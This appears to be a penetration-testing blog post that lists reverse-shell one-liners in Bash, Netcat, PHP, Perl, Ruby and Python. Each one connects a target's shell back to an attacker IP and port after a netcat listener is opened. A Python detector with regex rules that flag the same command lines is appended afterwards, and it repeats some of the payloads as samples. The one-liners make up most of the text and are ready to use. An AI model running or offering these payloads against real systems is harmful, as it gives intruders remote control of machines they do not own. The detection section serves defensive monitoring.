In this post, we'll explore several ways to obtain an interactive shell when you discover a command execution vulnerability during penetration testing. The choice of reverse shell method depends on the programming languages available on the target server. We'll cover commands for reverse shells using PHP, Python, Ruby, and more.
Before proceeding, ensure that your attacking computer is set to "listen" using netcat:
sudo nc -l 1337
Here, 1337 is the port you open for listening. Replace it with your preferred port if needed.
Reverse shell using Bash
Bash is a straightforward method for a reverse shell. Run this command on the target machine:
bash -i >& /dev/tcp/192.168.48.133/1337 0>&1
Replace 192.168.48.133 with your attacker's IP and 1337 with your chosen port.
Reverse shell using Netcat
Netcat is another common option for reverse shells. Use the following command:
/bin/nc.traditional -e /bin/sh 192.168.48.133 1337
Reverse shell using PHP
For servers with PHP installed, use this command:
php -r '$sock=fsockopen("192.168.48.133",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
If this fails, try changing the file descriptor number from 3 to 4, 5, or 6.
Reverse shell using Perl
Perl can also be used for a reverse shell. Run this command:
perl -e 'use Socket;$i="192.168.48.133";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Reverse shell using Ruby
Ruby provides another method for reverse shells. Use this command:
ruby -rsocket -e 'f=TCPSocket.open("192.168.48.133",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Reverse shell using Python
Python is a versatile choice for reverse shells. Execute the following command:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.48.133",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
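From the defender's side, these same one-liners are what a process-creation monitor should be watching for. The following is an added example, not part of the original post: a small Python detector that applies heuristic rules derived from the commands above to process command lines and reports which reverse-shell pattern matched (the rule names and sample command lines are constructed for illustration; tune the patterns against your own auditd or EDR telemetry).

```python
"""Flag interpreter/shell command lines that resemble the reverse shells above."""
import re

# Each rule: (name, regexes that must ALL match the command line).
# Heuristics derived from the one-liners in this post; not an exhaustive signature set.
RULES = [
    ("bash /dev/tcp redirect", [r"/dev/tcp/\d+\.\d+\.\d+\.\d+/\d+"]),
    ("netcat -e shell", [r"\bnc(\.traditional)?\b", r"\s-e\s+/bin/(ba)?sh\b"]),
    ("php fsockopen + exec", [r"\bphp\b", r"fsockopen\(", r"\bexec\("]),
    ("perl Socket + exec", [r"\bperl\b", r"use Socket", r"\bexec\("]),
    ("ruby TCPSocket + exec", [r"\bruby\b", r"TCPSocket", r"\bexec\b"]),
    ("python socket + dup2", [r"\bpython[23]?\b", r"socket\.socket\(", r"dup2\("]),
]


def detect_reverse_shell(cmdline: str) -> list[str]:
    """Return the names of every rule whose patterns all match the command line."""
    return [name for name, patterns in RULES
            if all(re.search(p, cmdline) for p in patterns)]


# Constructed sample process command lines (not from a real incident).
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/192.168.48.133/1337 0>&1",
    "/bin/nc.traditional -e /bin/sh 192.168.48.133 1337",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"
    "socket.SOCK_STREAM);s.connect((\"192.168.48.133\",1337));os.dup2(s.fileno(),0)'",
    "nc -zv 192.168.48.133 1337",                               # port check, no -e: benign
    "python -c 'import socket; print(socket.gethostname())'",  # no dup2/connect: benign
]


def scan(cmdlines: list[str]) -> dict[str, list[str]]:
    """Return {cmdline: [matched rule names]} for every command line that matched."""
    results = {}
    for cmd in cmdlines:
        hits = detect_reverse_shell(cmd)
        if hits:
            results[cmd] = hits
    return results


if __name__ == "__main__":
    for cmd, names in scan(SAMPLE_CMDLINES).items():
        print(f"ALERT {names}: {cmd}")
```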